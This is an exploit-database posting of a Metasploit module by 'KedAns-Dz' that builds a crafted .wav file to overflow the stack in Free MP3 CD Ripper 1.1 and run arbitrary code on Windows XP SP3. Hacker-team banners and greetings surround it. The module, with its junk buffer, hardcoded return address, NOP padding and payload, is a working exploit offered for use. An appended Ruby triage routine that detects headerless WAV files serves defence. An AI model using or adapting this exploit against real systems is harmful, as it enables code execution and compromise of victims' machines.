Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit (MSF)
Source: http://facebook.com/KedAns  Author: KedAns-Dz  Published: 2011-09-05
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit (MSF)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Local Buffer Overflow
# Tested on : Windows XP SP3 (en)
##

##
# $Id: freeripper_bof.rb  2011-09-02 03:03  KedAns-Dz $
##

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::FILEFORMAT
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit',
      'Description' => %q{
        This module exploits a stack buffer overflow in Free MP3 CD Ripper
        version 1.1. By creating a specially crafted .wav file, an attacker
        may be able to execute arbitrary code.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'X-h4ck', # Original
          'KedAns-Dz <ked-h[at]hotmail.com>' # MSF Module
        ],
      'Version' => 'Version 1.0',
      'References' =>
        [
          [ 'URL', 'http://exploit-db.com/exploits/17727' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP-SP3 (En)', { 'Ret' => 0x76B43ADC } ], # fdivr qword edx / mov ah,0x76
        ],
      'Privileged' => false,
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ], self.class)
  end

  def exploit
    sploit = rand_text_alphanumeric(4112) # Buffer Junk
    sploit << [target.ret].pack('V')      # Ret from the selected target, packed little-endian
    sploit << make_nops(15)               # NOP padding before the payload
    sploit << payload.encoded

    ked = sploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(ked)
  end
 
end

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_ 
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
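
Added example (not part of the original advisory or of Metasploit): the module above writes its buffer straight into the file, so the resulting "msf.wav" has no RIFF/WAVE container at all. The Ruby check below is a defender-side triage that flags such input before it reaches an audio parser; the function names, the prefix threshold and both sample files are assumptions of this example.

```ruby
RIFF_HEADER_LEN = 12      # "RIFF" + uint32 LE size + "WAVE"
ALNUM_PREFIX_LIMIT = 256  # assumed threshold: audio files do not open with long [A-Za-z0-9] runs

# Returns a list of findings; an empty list means the container looks well formed.
def wav_findings(data)
  data = data.b
  return [:too_short] if data.bytesize < RIFF_HEADER_LEN

  findings = []
  magic, riff_size, form = data.unpack('a4Va4')
  findings << :bad_riff_magic unless magic == 'RIFF'
  findings << :bad_wave_form unless form == 'WAVE'
  prefix = data[/\A[A-Za-z0-9]*/].bytesize
  findings << :long_alnum_prefix if prefix >= ALNUM_PREFIX_LIMIT
  return findings unless findings.empty?

  findings << :riff_size_exceeds_file if riff_size + 8 > data.bytesize
  seen = []
  pos = RIFF_HEADER_LEN
  while pos + 8 <= data.bytesize
    id, size = data.byteslice(pos, 8).unpack('a4V')
    if pos + 8 + size > data.bytesize
      findings << :chunk_overruns_file
      break
    end
    seen << id
    pos += 8 + size + (size & 1) # chunks are padded to an even length
  end
  findings << :missing_fmt_chunk unless seen.include?('fmt ')
  findings << :missing_data_chunk unless seen.include?('data')
  findings
end

# Constructed sample: minimal PCM file (mono, 8 kHz, 8-bit, four samples).
def sample_valid_wav
  fmt = [1, 1, 8000, 8000, 1, 8].pack('vvVVvv')
  body = 'WAVE'.b + 'fmt ' + [fmt.bytesize].pack('V') + fmt +
         'data' + [4].pack('V') + ("\x80".b * 4)
  'RIFF'.b + [body.bytesize].pack('V') + body
end

# Constructed sample with the same shape as the module's output:
# 4112 alphanumerics, then non-audio bytes (inert zeros here).
def sample_headerless_blob
  ('a'..'z').to_a.cycle.first(4112).join.b + ("\x00".b * 64)
end
```

A finding list such as bad_riff_magic plus long_alnum_prefix on a file named *.wav is a reasonable trigger for quarantine at a mail or download gateway, independent of the specific return address or payload used.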


 